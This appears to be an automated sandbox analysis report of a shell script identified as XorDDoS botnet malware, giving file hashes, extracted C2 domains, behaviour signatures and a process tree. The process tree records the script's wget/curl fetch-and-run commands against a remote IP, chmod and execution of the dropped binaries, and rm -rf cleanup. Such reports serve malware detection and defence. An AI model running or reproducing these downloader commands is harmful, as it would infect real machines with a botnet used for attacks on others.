Overview

overview

10

Static

static

1

112.sh

ubuntu-18.04-amd64

10

112.sh

debian-9-armhf

10

112.sh

debian-9-mips

10

112.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    75s
  • max time network
    86s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    22-12-2024 07:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    112.sh

  • Size

    318B

  • MD5

    0368897400a135549c0a2d9d83d384cc

  • SHA1

    29c933b2a8dd201b4aaea73789664dda02c2fe75

  • SHA256

    ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4

  • SHA512

    00216c30c5ab73b63821846febd159ac0be3c5a6658921ce9753c858ff2f83d698518c67283a9b2bea9da6067698b1302b6d84bf65ada476aba60bc35eedd758

Score
10/10
xorddosantivmbotnetdefense_evasiondiscoverydownloader

Malware Config

Extracted

Family

xorddos

C2

api.markerbio.com:112

api.enoan2107.com:112

http://qq.com/lib.asp
Attributes
  • crc_polynomial

    CDB88320

xor.plain

Signatures

  • XorDDoS

    Botnet and downloader malware targeting Linux-based operating systems and IoT devices.

    botnetdownloaderxorddos
  • XorDDoS payload 1 IoCs
  • Xorddos family
    xorddos
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 2 IoCs
  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/112.sh
    /tmp/112.sh
    1⤵
      PID:646
      • /usr/bin/wget
        wget http://43.249.172.195:888/112
        2⤵
        • Writes file to tmp directory
        PID:647
      • /usr/bin/curl
        curl -O http://43.249.172.195:888/112
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:753
      • /bin/chmod
        chmod +x 112
        2⤵
        • File and Directory Permissions Modification
        PID:761
      • /tmp/112
        ./112
        2⤵
        • Executes dropped EXE
        PID:762
      • /usr/bin/wget
        wget http://43.249.172.195:888/112s
        2⤵
        • Writes file to tmp directory
        PID:764
      • /usr/bin/curl
        curl -O http://43.249.172.195:888/112s
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:768
      • /bin/chmod
        chmod +x 112s
        2⤵
        • File and Directory Permissions Modification
        PID:773
      • /tmp/112s
        ./112s
        2⤵
        • Executes dropped EXE
        PID:774
      • /bin/rm
        rm -rf 112.sh
        2⤵
          PID:776
        • /bin/rm
          rm -rf 112
          2⤵
            PID:777
          • /bin/rm
            rm -rf 112s
            2⤵
              PID:778

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/112
            Filesize

            549KB

            MD5

            f9191bab1e834d4aef3380700639cee9

            SHA1

            9c20269df6694260a24ac783de2e30d627a6928a

            SHA256

            ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73

            SHA512

            3d2758fe2d06183e627b5cc24919c08c84108f2efd7ab0a162029d55537476410d9535d50f3eb059f7153f7482c134284862eea121201f82838aace4b12283b5

            Download Submit